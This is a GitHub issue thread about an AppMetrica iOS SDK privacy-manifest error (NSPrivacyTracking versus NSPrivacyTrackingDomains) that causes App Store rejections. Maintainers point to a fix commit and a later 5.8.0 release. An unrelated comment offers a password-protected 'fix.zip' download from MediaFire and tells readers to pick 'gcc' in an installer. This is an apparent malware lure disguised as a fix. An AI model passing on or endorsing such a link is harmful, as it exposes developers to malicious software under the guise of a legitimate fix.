### ISSUE TITLE
AppMetricaCore NSPrivacyTrackingDomains

### ISSUE THREAD

**Issue by va1et** [appmetrica/appmetrica-sdk-ios#20]
### 📚 AppMetrica SDK Version

5.2.0

### 🛠️ Xcode Version

15.0

### 📱 Device Information

iPhone 15 Pro

### ⚙️ Installation Method

CocoaPods

### 📝 Description

TMS-91107: Invalid tracking information - A PrivacyInfo.xcprivacy file contains invalid tracking information at the following path: “Frameworks/AppMetricaCore.framework/AppMetricaCore.bundle/PrivacyInfo.xcprivacy”. In addition to the privacy manifest files in the locations outlined in the documentation, starting November 12, 2024, all privacy manifests you submit must have valid content. NSPrivacyTracking must be true if NSPrivacyTrackingDomains isn’t empty.
After last commit https://github.com/appmetrica/appmetrica-sdk-ios/commit/6cc0790122d2a79ea3a3a4ec2f47b60a8ee17ee5
i got this error after deploying new version

### 📋 Relevant AppMetrica Log Output or Crash Logs

<details>
<summary>Expand to view logs</summary>
<br>

```
// Your logs go here
```

</details>

### 📦 Attach Package.resolved (Swift Package Manager Users)

<details>
<summary>Click to expand <code>Package.resolved</code></summary>
<br>

```json
// Replace with your Package.resolved contents
```

</details>

### 🍫 Attach Podfile.lock (CocoaPods Users)

<details>
<summary>Click to expand <code>Podfile.lock</code></summary>
<br>

```ruby
// Replace with your Podfile.lock contents
```

</details>

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GLinnik21** [comment]
Hi, @va1et!
We're aware of this PrivacyInfo.xcprivacy issue, and the commit you referenced (6cc0790) is indeed the fix, but it hasn't made it to the official release yet. This change isn't available in the release version you're using (5.2.0) unless you're specifically using CocoaPods with the `main` branch containing the fix. You'll need to either update your CocoaPods configuration to use that specific branch or wait for the next official release.

**Comment by LaCost765** [comment]
> Hi, @va1et! We're aware of this PrivacyInfo.xcprivacy issue, and the commit you referenced ([6cc0790](https://github.com/appmetrica/appmetrica-sdk-ios/commit/6cc0790122d2a79ea3a3a4ec2f47b60a8ee17ee5)) is indeed the fix, but it hasn't made it to the official release yet. This change isn't available in the release version you're using (5.2.0) unless you're specifically using CocoaPods with the `main` branch containing the fix. You'll need to either update your CocoaPods configuration to use that specific branch or wait for the next official release.

Hi! May I know when you will publish a release with a fix for this problem?

**Comment by waslost0** [comment]
similar issue with flutter package https://pub.dev/packages/appmetrica_plugin

**Comment by Sergey70** [comment]
> > Hi, @va1et! We're aware of this PrivacyInfo.xcprivacy issue, and the commit you referenced ([6cc0790](https://github.com/appmetrica/appmetrica-sdk-ios/commit/6cc0790122d2a79ea3a3a4ec2f47b60a8ee17ee5)) is indeed the fix, but it hasn't made it to the official release yet. This change isn't available in the release version you're using (5.2.0) unless you're specifically using CocoaPods with the `main` branch containing the fix. You'll need to either update your CocoaPods configuration to use that specific branch or wait for the next official release.
> 
> Hi! May I know when you will publish a release with a fix for this problem?

Hello, the release is expected to be approximately next week.

**Comment by ninasaveljeva** [comment]
Same error on AppMetrica version 5.7.0

**Comment by Sergey70** [comment]
> > > > Hi, @va1et! We're aware of this PrivacyInfo.xcprivacy issue, and the commit you referenced ([6cc0790](https://github.com/appmetrica/appmetrica-sdk-ios/commit/6cc0790122d2a79ea3a3a4ec2f47b60a8ee17ee5)) is indeed the fix, but it hasn't made it to the official release yet. This change isn't available in the release version you're using (5.2.0) unless you're specifically using CocoaPods with the `main` branch containing the fix. You'll need to either update your CocoaPods configuration to use that specific branch or wait for the next official release.
> > > 
> > > 
> > > Hi! May I know when you will publish a release with a fix for this problem?
> > 
> > 
> > Hello, the release is expected to be approximately next week.
> 
> Hi! Any updates?

Thank you for your patience, and we apologize for the delay. The release is expected in the next few days. We're in the final stages of preparation, and everything is on track.

**Comment by Sergey70** [comment]
Released version 5.8.0 including the fix.
